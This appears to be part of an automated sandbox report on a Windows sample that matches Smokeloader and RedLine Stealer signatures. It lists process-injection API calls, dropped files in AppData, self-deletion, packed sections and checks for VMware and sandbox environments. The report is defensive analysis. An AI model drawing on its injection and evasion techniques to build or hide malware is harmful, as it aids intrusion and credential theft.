    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_004014FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004014FB
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_00401641 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401641
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_00403257 RtlCreateUserThread,NtTerminateProcess,6_2_00403257
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_00401606 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401606
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401613
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_00401627 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401627
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015FB
    Source: C:\Users\user\AppData\Roaming\fgbwcitCode function: 8_2_00403103 RtlCreateUserThread,NtTerminateProcess,8_2_00403103
    Source: C:\Users\user\AppData\Roaming\fgbwcitCode function: 8_2_004014FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_004014FB
    Source: C:\Users\user\AppData\Roaming\fgbwcitCode function: 8_2_00401641 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401641
    Source: C:\Users\user\AppData\Roaming\fgbwcitCode function: 8_2_00403257 RtlCreateUserThread,NtTerminateProcess,8_2_00403257
    Source: C:\Users\user\AppData\Roaming\fgbwcitCode function: 8_2_00401606 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401606
    Source: C:\Users\user\AppData\Roaming\fgbwcitCode function: 8_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401613
    Source: C:\Users\user\AppData\Roaming\fgbwcitCode function: 8_2_00401627 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401627
    Source: C:\Users\user\AppData\Roaming\fgbwcitCode function: 8_2_00403433 GetKeyboardLayoutList,OpenProcessToken,GetTokenInformation,NtEnumerateKey,8_2_00403433
    Source: C:\Users\user\AppData\Roaming\fgbwcitCode function: 8_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_004015FB
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415B600_2_00415B60
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_00415B605_2_00415B60
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_004158406_2_00415840
    Source: C:\Users\user\AppData\Roaming\fgbwcitCode function: 8_2_004158408_2_00415840
    Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000005.00000002.2089545393.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000008.00000002.2686603157.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000006.00000002.2387106180.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000008.00000002.2686820373.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000005.00000002.2089476769.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000008.00000002.2686854364.0000000002E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000005.00000002.2089645639.0000000002D57000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000006.00000002.2387169374.0000000002C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000000.00000002.1818628832.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000000.00000002.1818742060.0000000002DB7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000006.00000002.2387276728.0000000002C67000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.1818859603.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000008.00000002.2687018881.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000000.00000002.1818600751.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000006.00000002.2387127676.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000005.00000002.2089499262.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: 565.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: fgbwcit.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: trbwcit.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@22/3
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02DBAE2E CreateToolhelp32Snapshot,Module32First,0_2_02DBAE2E
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\trbwcitJump to behavior
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\565.tmpJump to behavior
    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeReversingLabs: Detection: 36%
    Source: file.exeVirustotal: Detection: 39%
    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\trbwcit C:\Users\user\AppData\Roaming\trbwcit
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\565.exe C:\Users\user\AppData\Local\Temp\565.exe
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\fgbwcit C:\Users\user\AppData\Roaming\fgbwcit
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\trbwcit C:\Users\user\AppData\Roaming\trbwcit
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\fgbwcit C:\Users\user\AppData\Roaming\fgbwcit
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\565.exe C:\Users\user\AppData\Local\Temp\565.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\trbwcitSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\trbwcitSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\trbwcitSection loaded: msvcr100.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\565.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\565.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\565.exeSection loaded: msvcr100.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\fgbwcitSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\fgbwcitSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\fgbwcitSection loaded: msvcr100.dllJump to behavior
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.vugud:W;.fay:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\trbwcitUnpacked PE file: 5.2.trbwcit.400000.0.unpack .text:ER;.rdata:R;.data:W;.vugud:W;.fay:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Local\Temp\565.exeUnpacked PE file: 6.2.565.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.puneki:W;.fok:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\fgbwcitUnpacked PE file: 8.2.fgbwcit.400000.0.unpack .text:ER;.rdata:R;.data:W;.puneki:W;.fok:W;.rsrc:R; vs .text:EW;
    Source: file.exeStatic PE information: section name: .vugud
    Source: file.exeStatic PE information: section name: .fay
    Source: 565.exe.1.drStatic PE information: section name: .puneki
    Source: 565.exe.1.drStatic PE information: section name: .fok
    Source: fgbwcit.1.drStatic PE information: section name: .puneki
    Source: fgbwcit.1.drStatic PE information: section name: .fok
    Source: trbwcit.1.drStatic PE information: section name: .vugud
    Source: trbwcit.1.drStatic PE information: section name: .fay
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02D81540 pushad ; ret 0_2_02D81550
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02DBE887 push esp; ret 0_2_02DBE889
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02DBCC2A push B63524ADh; retn 001Fh0_2_02DBCC61
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02DBD727 pushfd ; iretd 0_2_02DBD728
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_004014D9 pushad ; ret 5_2_004014E9
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_004031DB push eax; ret 5_2_004032AB
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_02CC1540 pushad ; ret 5_2_02CC1550
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_02D5DF6F push esp; ret 5_2_02D5DF71
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_02D5C312 push B63524ADh; retn 001Fh5_2_02D5C349
    Source: C:\Users\user\AppData\Roaming\trbwcitCode function: 5_2_02D5CE0F pushfd ; iretd 5_2_02D5CE10
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_00402842 pushad ; retf F6A4h6_2_004029D1
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_00401065 pushfd ; retf 6_2_0040106A
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_00402805 push 21CACAEFh; iretd 6_2_0040280A
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_00402511 push ebp; iretd 6_2_00402523
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_00403325 push eax; ret 6_2_004033F3
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_00403433 pushad ; ret 6_2_004035AB
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_00401182 push esp; retf 6_2_0040118E
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_00402A9D pushad ; retf 6_2_00402AAB
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_004012B7 push cs; iretd 6_2_004012B8
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_02BF11E9 push esp; retf 6_2_02BF11F5
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_02BF10CC pushfd ; retf 6_2_02BF10D1
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_02BF131E push cs; iretd 6_2_02BF131F
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_02BF2B04 pushad ; retf 6_2_02BF2B12
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_02BF2578 push ebp; iretd 6_2_02BF258A
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_02BF286C push 21CACAEFh; iretd 6_2_02BF2871
    Source: C:\Users\user\AppData\Roaming\fgbwcitCode function: 8_2_00402842 pushad ; retf F6A4h8_2_004029D1
    Source: C:\Users\user\AppData\Roaming\fgbwcitCode function: 8_2_00401065 pushfd ; retf 8_2_0040106A
    Source: C:\Users\user\AppData\Roaming\fgbwcitCode function: 8_2_00402805 push 21CACAEFh; iretd 8_2_0040280A
    Source: C:\Users\user\AppData\Roaming\fgbwcitCode function: 8_2_00402511 push ebp; iretd 8_2_00402523
    Source: file.exeStatic PE information: section name: .text entropy: 7.548546960257042
    Source: 565.exe.1.drStatic PE information: section name: .text entropy: 7.527012054123166
    Source: fgbwcit.1.drStatic PE information: section name: .text entropy: 7.527012054123166
    Source: trbwcit.1.drStatic PE information: section name: .text entropy: 7.548546960257042
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\565.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fgbwcitJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\trbwcitJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fgbwcitJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\trbwcitJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\trbwcit:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\fgbwcit:Zone.Identifier read attributes | deleteJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\trbwcitKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\trbwcitKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\trbwcitKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\trbwcitKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\trbwcitKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\trbwcitKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\565.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\565.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\565.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\565.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\565.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\565.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\fgbwcitKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\fgbwcitKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\fgbwcitKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\fgbwcitKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\fgbwcitKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\fgbwcitKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
    Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
    Source: C:\Users\user\AppData\Roaming\trbwcitAPI/Special instruction interceptor: Address: 7FFE2220E814
    Source: C:\Users\user\AppData\Roaming\trbwcitAPI/Special instruction interceptor: Address: 7FFE2220D584
    Source: C:\Users\user\AppData\Local\Temp\565.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
    Source: C:\Users\user\AppData\Local\Temp\565.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
    Source: C:\Users\user\AppData\Roaming\fgbwcitAPI/Special instruction interceptor: Address: 7FFE2220E814
    Source: C:\Users\user\AppData\Roaming\fgbwcitAPI/Special instruction interceptor: Address: 7FFE2220D584
    Source: file.exe, 00000000.00000002.1818652530.0000000002DAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKK
    Source: trbwcit, 00000005.00000002.2089569159.0000000002D4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK4
    Source: C:\Users\user\AppData\Local\Temp\565.exeCode function: 6_2_00401E65 rdtsc 6_2_00401E65
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 432Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3142Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 652Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 869Jump to behavior
    Source: C:\Windows\explorer.exe TID: 7540Thread sleep count: 432 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 7548Thread sleep count: 3142 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 7548Thread sleep time: -314200s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 7544Thread sleep count: 652 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 7544Thread sleep time: -65200s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 7888Thread sleep count: 268 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 7896Thread sleep count: 272 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 7892Thread sleep count: 270 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 8068Thread sleep count: 91 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 8072Thread sleep count: 128 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 8076Thread sleep count: 132 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 7548Thread sleep count: 62 > 30Jump to behavior
    Source: explorer.exe, 00000001.00000000.1809487510.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
    Source: explorer.exe, 00000001.00000000.1808911051.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
